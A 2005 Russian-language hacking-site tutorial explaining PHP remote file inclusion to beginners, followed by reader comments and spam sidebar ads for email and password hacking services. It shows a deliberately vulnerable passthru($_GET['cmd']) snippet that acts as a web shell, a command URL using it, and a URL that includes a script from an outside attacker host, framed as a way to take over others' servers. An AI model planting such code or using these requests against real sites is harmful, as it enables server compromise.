Контакты

Для связи с нами можно использовать:
irc://irc.chatnet.ru:#gfs
icq://546460
email://cobalt[@]gfs-team.ru

Все материалы предоставлены только с ознакомительной целью
ГлавнаяСтатьиХакингPHP инклюдинг для новичков
© Cobalt 06.12.2005

Сегодня я расскажу тебе о типе атаки под названием php including. Если ты хоть чуть-чуть знаешь буржуйский, то тебе не сложно будет догадаться о смысле этого словосочетания. Если же в аглицком ты не шаришь, то я тебе переведу =).

Дословно - PHP включение. Т.е. включение в выполняемый код своего куска. Это возможно по тому что скрипт пхп выполнется непосредственно на сервере, соответственно, можно при благоприятных условиях заставить сервер выполнить свой код. Смысл атаки в следующем: имеется некий скрипт на пхп, то может быть что угодно, форум, гостевая книга, поисковик, просто движок сайта, это совершенно не играет роли. Главное, что этот скрипт не содержит проверки вводимых данных. Просто кодер поленился и не добавил ее туда, типа «Зачем еще пару лишних строчек писать? И так сойдет…». К чему такое наплевательское отношение может привести, я сейчас тебе покажу на простейшем примере. Давайте напишем маленький пхп скрипт:


      <?
       passthru($_GET[‘cmd’]);
      ?>

Назовем его для примера bug.php и выложим на хостинг с поддержкой пхп. Теперь наберем в браузере:

http://host.zone/bug.php?cmd=ls

Вау! Что мы видим? Результат выполнения команды «ls» =) Вот такая вот «бага» в скрипте может привести к взлому сайта. А все из-за того что мы поленились выполнить проверку параметра $_GET[‘cmd’].

Это был простейший пример чтобы продемонстрировать тебе смысл атаки типа пхп инклюдинг. На самом деле все обстоит несколько сложнее. Такого рода баг вы вряд ли встретите. Обычно в качестве параметра передают ссылку на другой скрипт, либо на какие-то другие данные. Но, что нам мешает вместо например

http://host.zone/script.php?file=data

Написать:

http://host.zone/script.php?file=http://my_host.zone/my_script.php ? =)

Вот так-то, ты и можешь поиметь чей-то сервант.

На этом собственно и все. Ты наверно часто встречал на сайтах типа www.securitylab.ru инфу об обнаружении возможности пхп инклюдинга в различных скриптах. Тебе конечно ни кто не мешает попытаться заюзать это дело и радоваться жизни. Но если ты настоящий хакер, а не простой скрипт кидис то ты все-таки дочитаешь эту статью до конца =).

Использовать баги найденные другими – каждый дурак может, ты попробуй сам найти какую-нибудь. Для этого тебе надо скачать оригинал стандартного скрипта который используется на многих сайтах. Например, в свое время очень часто баги находили в известном форуме phpBB2, его можно совершенно бесплатно скачать с официального сайта проекта. Потом ты должен проанализировать код. Полностью разобраться в том как работает этот самый скрипт. Потом уже дело техники, найти функцию которая обрабатывает потенциально опасные данные и в перед =).




© Cobalt 06.12.2005

e-Commerce Partners Network
fraIzer написал:

хмм не фантан, вообще не расписано, статья абы как, лишь бы написать, этой инфы вряд ли хватит, чтобы найти багу в скрипте, тем более уж в phpBB2...

sergio написал:

Это типа такого: Посмотрите как я крут! как много я знаю! Но вам не скажу...

sergio написал:

Такого рода статьи пишутся в угоду чувству собственной важности... чтоб потом зайти на сайт где это размещено и пустить тоненькую струйку слюны на клаву, или даже слезу, и подумать про себя с гордостью: ВОТ ОН КАКОЙ Я!

v373r написал:

посмотрите на год опубликования статьи прежде чем извергать слюну и брызгать пеной

test user написал:

Нормальная статься. Просто описания типа атаки или вида уязвимости, кому как угодно. Тот, кто что-то в этом понимает разберется что с этим делать.

гай_инкогнито написал:

для новичков вполне полезная информация..

TilerD написал:

Статья абсолютно бесполезна. Точ то можно что-то делать и чего-то при этом добиться известно по умолчанию. Следовательно автор статьи просто сотресает воздух.

полковник написал:

спасибо!

Ник:

Текст:
P Br B I Qute



Код: обновить
Последние комментарии
24.06.2017 21:15:55 DeweyAloma написал:
If you have a desire to learn how to earn from...
Ручная распаковка NeoLite 2.0
24.06.2017 14:43:35 Issacpam написал:
Ckaйп evg7773 Ламинин +38097-613-1437 Laminine LPGN в Хуст Закарпатье 28 usd...
Взлом домофонов
21.06.2017 04:39:52 PRO написал:
Взлом и подбор паролей на почтовых сервисах и социальных сетях. Работаем со всеми...
Взлом E-mail (email, почты, мыла)
Реклама

Тут должна была быть ваша реклама, но мы потеряли глиняную табличку с ее текстом. SapeId: 665044

Rambler's Top100